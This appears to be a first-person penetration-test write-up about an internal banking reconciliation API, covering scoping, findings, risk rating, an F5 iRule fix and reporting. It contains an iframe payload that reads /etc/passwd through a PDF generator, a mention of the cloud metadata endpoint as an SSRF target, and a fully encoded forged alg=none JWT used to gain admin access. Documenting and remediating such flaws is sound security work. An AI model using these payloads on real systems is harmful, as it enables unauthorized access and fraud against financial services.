Pros
- Demonstrates the complete lifecycle of a high-stakes penetration test in a zero-downtime environment
- Combines practical exploit commands with strategic risk analysis and decision matrices
- Illustrates the maturity difference between simply 'running exploits' and acting as a trusted security advisor
- Provides deep insight into how technical flaws (like JWT and TLS configs) translate directly into financial liability
- Showcases collaborative red-blue team dynamics and expert reporting methodologies including remediation code
Cons
- Assumes advanced knowledge of application architecture, authentication, and cryptography
- Limits focus purely to logical attack paths rather than generic automated scanning
- Requires understanding of compliance mandates (PCI-DSS, GLBA) to fully grasp the risk logic
Operating offensively within a Tier-1 financial institution fundamentally alters your methodology. In a standard assessment, taking down a QA server might warrant an apology. In banking, triggering a denial-of-service on a SWIFT gateway or interrupting an overnight batch-processing queue is an immediate termination event with potential regulatory fallout.
This is the anatomy of a real, restricted-scope enterprise banking penetration test. It highlights both the practical technical commands used to exploit the infrastructure, and the operational mindset required when operating under zero-tolerance constraints.
1. Engagement Planning: Analyzing the Blast Radius
The mandate is a targeted assessment of a newly developed internal payment reconciliation API. It’s a gray-box test, conducted remotely through a hardened VDI jumpbox. I know the SIEM is watching. I know the IDS is active.
Before a single packet is sent, the most critical phase occurs: defining the Rules of Engagement (RoE). In banking, assuming a staging environment is “safe” is the most dangerous assumption an operator can make. Legacy mainframes and upstream vendor APIs are frequently hardcoded across DEV, UAT, and PROD.
My analysis starts with the Architecture Diagram. I am explicitly identifying the data flows connecting this new API to the legacy Core Banking System.
- Why? If I discover a SQL payload that cascades out of the API and accidentally locks a production mainframe database table during overnight processing, I have caused a disruption. The constraints change my approach from aggressive fault injection to surgical, measured data-payload testing.
2. Target Understanding: Mapping the Business Logic
I am not just scanning for open ports; I am looking for business logic. The application is a RESTful API meant to reconcile intra-day ledger discrepancies.
I ignore the load balancers and WAF initially. I need to understand what this API actually does.
- Where does authentication happen?
- Is authorization handled via JWT, an external Identity Provider (Okta), or legacy session state?
- Does changing an account parameter trigger an automated batch file generation, or is it a direct database query?
Understanding the business process dictates exactly where the highest value vulnerabilities live. A generic Cross-Site Scripting (XSS) finding is irrelevant here. I am hunting for Insecure Direct Object References (IDOR) and authorization bypasses that allow unauthorized ledger modifications.
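The hunting logic above can be sketched in a few lines. This is an illustrative model only, not the engagement tooling: the endpoint paths and the fetch_status callable (path -> HTTP status, issued with a low-privilege token) are hypothetical stand-ins.

```python
# Hypothetical authorization-gap probe: request admin-only resources with a
# low-privilege token and flag any that answer 200 instead of 401/403.
# Paths and the fetch_status callable are illustrative assumptions.
ADMIN_ONLY = (
    "/api/v1/admin/users",
    "/api/v1/ledger/adjustments",
)

def find_authz_gaps(fetch_status) -> list:
    """Return the admin-only paths a readonly token can still read."""
    return [path for path in ADMIN_ONLY if fetch_status(path) == 200]
```

Injecting the transport as a callable keeps the decision logic testable without touching the network.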
3. Initial Access Strategy
Because this is a specific web application scope within the internal network, my path isn’t a traditional external-to-internal pivot. My initial access strategy is purely unauthenticated API endpoint enumeration against the internal gateway.
The Trade-off: Speed versus WAF correlation.
If I fuzz the API aggressively with ffuf running 1,000 threads, the internal F5 load balancer will detect the high 404 rates and the SOC will sever my VDI connection. I must prioritize. I focus first on the authentication endpoints.
- Why? If I can bypass the auth mechanism entirely, the rest of the WAF filters usually implicitly trust the authenticated session.
I use Burp Suite’s Intruder set to a slow, randomized baseline (1 request every 3 seconds) just to map the application tree.
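The same pacing discipline applies outside Burp. A minimal sketch of the idea, assuming a ~3-second baseline: add jitter so the cadence never forms the machine-regular pattern a SIEM correlation rule keys on.

```python
import random

# Illustrative sketch (not the engagement tooling): generate randomized
# inter-request delays around a slow baseline so request timing does not
# form a perfectly regular, easily-correlated pattern.
def jittered_delays(count: int, baseline: float = 3.0, jitter: float = 0.5):
    """Yield `count` delays in seconds, uniformly jittered around baseline."""
    for _ in range(count):
        yield baseline + random.uniform(-jitter, jitter)
```

A driver loop would simply `time.sleep()` on each yielded value between requests; the generator keeps the pacing policy separate from the transport.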
4. Recon & Enumeration: Decision-Based Probing
I discover a reporting endpoint via manual flow mapping:
GET /api/v1/reports/generate?report_type=summary&format=pdf HTTP/1.1
Host: internal-recon.bank.local
Authorization: Bearer <low_priv_token>
Most automated tools will see report_type and flag “Potential parameter tampering.” But as an operator, I see a format=pdf flag. Backend PDF generation libraries typically run headless browsers (like Puppeteer) or utilize legacy binaries like wkhtmltopdf.
My next step isn’t just to fuzz the parameter; it’s to intentionally inject HTML/JS payloads designed specifically to test for Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI).
I modify the parameter practically:
GET /api/v1/reports/generate?report_type=<iframe src="file:///etc/passwd"></iframe>&format=pdf
I’m hoping the back-end PDF generator will render the host’s /etc/passwd file into the downloaded PDF, or allow me to hit the AWS Metadata endpoint (http://169.254.169.254/latest/meta-data/).
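In practice the payload has to be URL-encoded before it leaves the proxy, since raw angle brackets are rejected by many gateways. A hypothetical helper (the path is taken from the request above; the function name is mine):

```python
from urllib.parse import urlencode

# Hypothetical helper: build the probe URLs with the HTML payload
# properly URL-encoded in the report_type parameter.
BASE = "/api/v1/reports/generate"

def ssrf_probe_url(payload: str, fmt: str = "pdf") -> str:
    """Return the request path with the injected payload percent-encoded."""
    return f"{BASE}?{urlencode({'report_type': payload, 'format': fmt})}"

lfi = ssrf_probe_url('<iframe src="file:///etc/passwd"></iframe>')
ssrf = ssrf_probe_url('<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>')
```

Two probes, one for local file disclosure and one for the cloud metadata service, exactly mirroring the two outcomes described above.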
5. Vulnerability Identification: The Real Thinking
During the reconnaissance, I find two distinct issues:
- The Noise: The API server responds with a detailed Server: Apache/2.4.41 banner.
- The Vulnerability: The API uses a JWT for session state, but the token lacks an expiration claim (exp). Even worse, the server is misconfigured to accept unsigned tokens.
Automated scanners will flag the Server banner as a Medium risk “Information Disclosure.” In an enterprise banking environment behind three layers of reverse proxies, that finding is purely theoretical noise. I ignore it.
The JWT misconfiguration is the real vulnerability.
Original Extracted JWT Header & Payload (Decoded):
// Header
{"alg": "RS256", "typ": "JWT"}
// Payload
{"user": "jdoe", "role": "readonly_analyst", "iat": 1712610000}
6. Exploit Development Mindset
I intercept the API call in Burp Suite. I modify the payload to escalate my privileges from readonly_analyst to reconciliation_admin. Because I do not possess the server’s RSA private key to legitimately sign the token, I alter the header to force the algorithm to none.
Forged JWT:
// Forged Header
{"alg": "none", "typ": "JWT"}
// Forged Payload
{"user": "jdoe", "role": "reconciliation_admin", "iat": 1712610000}
// Signature: (Removed entirely)
I base64-url encode this structure:
eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJ1c2VyIjogImpkb2UiLCAicm9sZSI6ICJyZWNvbmNpbGlhdGlvbl9hZG1pbiIsICJpYXQiOiAxNzEyNjEwMDAwfQ.
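The encoding step can be reproduced with a short stdlib-only sketch (illustrative; it matches the JSON serialization shown above, spaces included):

```python
import base64
import json

def b64url(obj: dict) -> str:
    """Base64url-encode a JSON object with padding stripped; default
    json.dumps separators reproduce the ", " / ": " spacing shown above."""
    raw = json.dumps(obj).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

header = {"alg": "none", "typ": "JWT"}
payload = {"user": "jdoe", "role": "reconciliation_admin", "iat": 1712610000}

# alg=none tokens carry an empty third segment: header.payload.
forged = f"{b64url(header)}.{b64url(payload)}."
```

The trailing dot is deliberate: the signature segment is present but empty, which is exactly what a misconfigured verifier accepts.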
The Stop Condition: I inject this token and attempt to access the <bank>/api/v1/admin/users endpoint. It returns an HTTP 200 OK with a full list of system administrators. I now have administrative read access.
Do I attempt to delete a user or modify a production ledger to “prove” the impact? Absolutely not.
In a banking environment, proving exploitation stops the moment the critical risk is validated logically. Modifying data crosses the line from assessment to disruption. I securely log the HTTP 200 response and immediately cease exploitation.
7. Cryptography & Protocol Analysis
Simultaneously, during infrastructure mapping, I intercept the internal service-to-service communication using sslyze to audit the cryptography:
sslyze --regular internal-db-mq.bank.local:5671
The output confirms the middleware API communicates with the backend RabbitMQ message broker using TLS 1.0 and weak CBC ciphers (TLS_RSA_WITH_AES_128_CBC_SHA).
Why does this matter internally? Corporate environments operate on an “assume breach” model. Threat actors who breach the perimeter via phishing will passively sniff internal traffic. In a financial institution, weak internal cryptography lets an adversary moving laterally harvest plaintext credentials or payment PANs traversing the internal wire, for example via padding oracle attacks against the CBC ciphers. It is also an immediate compliance violation (PCI-DSS Requirement 4.1).
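The triage rule applied to the sslyze output boils down to string properties of the suite names. A minimal sketch, assuming standard TLS cipher-suite naming conventions (the marker list is my illustrative shorthand, not sslyze output parsing):

```python
# Illustrative triage helper: flag cipher suites that use CBC mode or
# static-RSA key exchange, the two properties that make the finding
# above reportable. Marker strings are an assumption based on standard
# IANA suite naming, not a complete weakness taxonomy.
WEAK_MARKERS = ("_CBC_", "TLS_RSA_WITH")

def is_weak_suite(suite: str) -> bool:
    return any(marker in suite for marker in WEAK_MARKERS)

def triage(suites: list) -> list:
    """Return the subset of negotiated suites worth reporting."""
    return [s for s in suites if is_weak_suite(s)]
```

Note that TLS_ECDHE_RSA_WITH_... suites do not match the static-RSA marker: forward-secret key exchange is exactly what distinguishes them.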
8. The Critical Decision Point
I now have three distinct findings:
- Weak TLS 1.0 on internal message queues.
- An exposed PDF generation endpoint (Blind SSRF).
- JWT Authentication Algorithm bypass (Authz Bypass).
Prioritization: The JWT Auth bypass takes extreme priority. Why? The SSRF requires complex exploitation and is neutered by internal egress filtering. Weak TLS requires an attacker to already have a highly privileged network sniffing position. The JWT bypass, however, requires exactly zero prerequisites. Any standard user on the internal network can instantly forge a token and achieve administrative control over the payment reconciliation system with a simple proxy intercept.
9. Risk Rating (The Consultant’s Reality)
I absolutely do not copy-paste CVSS scores. A base CVSS lacks business context.
- Technical Severity: High (Complete Authentication Bypass).
- Business Impact: Critical. This API reconciles mismatched payment batches. An attacker with admin rights could theoretically suppress reconciliation alerts on fraudulent outgoing SWIFT transfers.
- Exploitability: High (Requires no specialized tooling, only a tampered HTTP header).
My Final Rating: CRITICAL. Even though the application is strictly internal (lowering the initial technical threat model), the resulting business impact on financial integrity overrides the network location.
10. Mitigation Strategy: Playing the Advisor
Telling a bank to “Fix the JWT library” is useless. They have deployment freezes, heavy ITIL processes, and vendor dependencies. My advisory approach provides immediate, actionable code.
Short-Term (Next 24 Hours): Implement a strict WAF rule on the internal F5 load balancer (iRule) that drops any HTTP request containing a JWT header attempting to bypass signature validation.
when HTTP_REQUEST {
    if { [HTTP::header exists "Authorization"] } {
        set auth_header [HTTP::header "Authorization"]
        if { $auth_header contains "eyJhbGciOiAibm9uZS" } {
            # Drop alg=none tokens. Note: this matches one specific base64
            # serialization of the header; it is a stopgap, not the fix.
            HTTP::respond 401 content "Unauthorized - Invalid Token Algorithm"
            return
        }
    }
}
Medium-Term (Next Sprint): Update the heavily outdated backend authentication framework. Enforce signature validation against an explicit server-side algorithm allowlist (RS256 or HS256) in the application code, so the token header can never select its own algorithm.
Long-Term (Architecture): Migrate away from stateless JWTs for critical high-value financial API access. Move to stateful, heavily audited OAuth2 / OIDC session tokens where termination can be rapidly enforced by the central IdP.
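The medium-term fix reduces to one invariant: the server, never the token, chooses the algorithm. A stdlib-only sketch of that check (a real deployment would use a maintained JWT library with an explicit algorithms allowlist; function names here are mine):

```python
import base64
import json

# Server-side allowlist: the token header must never pick the algorithm.
ALLOWED_ALGS = {"RS256", "HS256"}

def parse_header(token: str) -> dict:
    """Decode the JWT header segment (base64url with padding restored)."""
    seg = token.split(".")[0]
    seg += "=" * (-len(seg) % 4)
    return json.loads(base64.urlsafe_b64decode(seg))

def reject_disallowed_alg(token: str) -> None:
    """Raise before any signature work if alg is off the allowlist."""
    alg = parse_header(token).get("alg", "")
    if alg not in ALLOWED_ALGS:
        raise ValueError(f"disallowed JWT algorithm: {alg!r}")

# The forged alg=none token from this assessment fails the check:
forged = "eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.e30."
try:
    reject_disallowed_alg(forged)
    rejected = False
except ValueError:
    rejected = True
```

Rejecting on the allowlist before touching the signature is the key ordering: an attacker-controlled alg field must never reach the verification routine.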
11. Reporting for Impact
A junior penetration tester writes reports grouped by technical vulnerability. An expert consultant writes reports grouped by attack narrative and business risk.
The Executive Summary is written purely for the CISO. It does not mention “JWT” or “alg:none”. It states: “Due to a critical flaw in session validation, any internal employee or compromised workstation can unilaterally authorize payment reconciliations without oversight. This violates separation-of-duties compliance and exposes the institution to unchecked insider wire fraud.”
The technical breakdown is written for the Lead Architect. It provides the exact Base64 strings, the exact line of the proposed F5 iRule, and the precise reproduction syntax.
12. Collaboration with Central Teams
During the read-out, the DevOps team argues that the JWT flaw isn’t Critical because “the API is only accessible from the internal corporate VPN segment.”
This is where the consultant proves their worth. I don’t argue the CVSS metrics. I argue the threat model. “The corporate VPN segment has 12,000 users. If a single user from HR clicks a phishing link and their laptop is compromised by an initial access broker, the attacker now shares that same VPN segment. Internal isolation is not a compensating control for broken core authentication on a financial application.” The finding remains Critical.
13. Continuous Security Improvement
The value of this assessment isn’t just finding the JWT flaw; it is identifying why the JWT flaw made it to production.
The advisory notes that the CI/CD pipeline lacks dynamic application security testing (DAST) for authentication mechanics. The true organizational maturity comes when the bank updates their pipeline to automatically fail any pull request that permits weak signing algorithms, permanently eliminating this entire class of vulnerability across the enterprise.
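Such a pipeline gate can be tiny. A hypothetical sketch: the build forges an alg=none token and fails unless the deployed service answers 401. The send callable (headers -> HTTP status) is an injected assumption so the check stays transport-agnostic and testable.

```python
# Hypothetical CI/DAST regression gate: fail the build unless the
# service rejects a forged alg=none token with 401. `send` is an
# injected callable (headers -> HTTP status); in the pipeline it would
# wrap a real HTTP client pointed at the staging deployment.
FORGED = "eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.e30."

def alg_none_rejected(send) -> bool:
    """True only if the forged unsigned token is refused with 401."""
    status = send({"Authorization": f"Bearer {FORGED}"})
    return status == 401
```

Wired into the pipeline as a failing check, this permanently encodes the finding as a regression test rather than a one-time report item.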
14. When Things Go Wrong
During the assessment, my SSRF payload attempts against the PDF generator suddenly start timing out. My VDI drops. The Blue Team (SOC) detected the rapid succession of anomalous internal payloads (file:///etc/passwd) and severed my access.
I do not hide this in the report. I celebrate it. As an offensive operator, my goal is also to validate defensive capability. I document the exact timestamp of my detection. I highlight that while the application was vulnerable, the SOC’s internal honeypot alerting worked flawlessly, preventing sustained exploitation. This validates their SIEM investment and proves the value of defense-in-depth.
15. Attacker vs. Defender Perspective
Everything I just mapped out is exactly how a sophisticated Ransomware-as-a-Service (RaaS) affiliate operates once inside an enterprise.
- The Attacker: Will use the JWT bypass to map high-value financial routing paths silently, establish persistence, and attempt to exfiltrate the dataset before deploying the encryptor payload.
- The Defender: Must realize that endpoint agents (EDR/AV) will not catch this. A forged JWT is a valid HTTP request traveling over port 443. Defense here relies entirely on identity analytics, strict access logging, and WAF protocol enforcement.
16. The Difference Between Pentesting and Offensive Security
A standard penetration tester runs automated tools, identifies technical misconfigurations, and hands over a spreadsheet of CVEs.
An Offensive Security Consultant understands that they are simulating a business risk. They understand that a vulnerability only matters precisely to the extent that it threatens the organization’s mission, capital, or reputation. In a Tier-1 banking environment, the ability to rapidly identify high-impact logical flaws, safely execute the practical exploit payload without causing an outage, and eloquently guide executive leadership through the remediation process is what ultimately separates the operators from the scanners.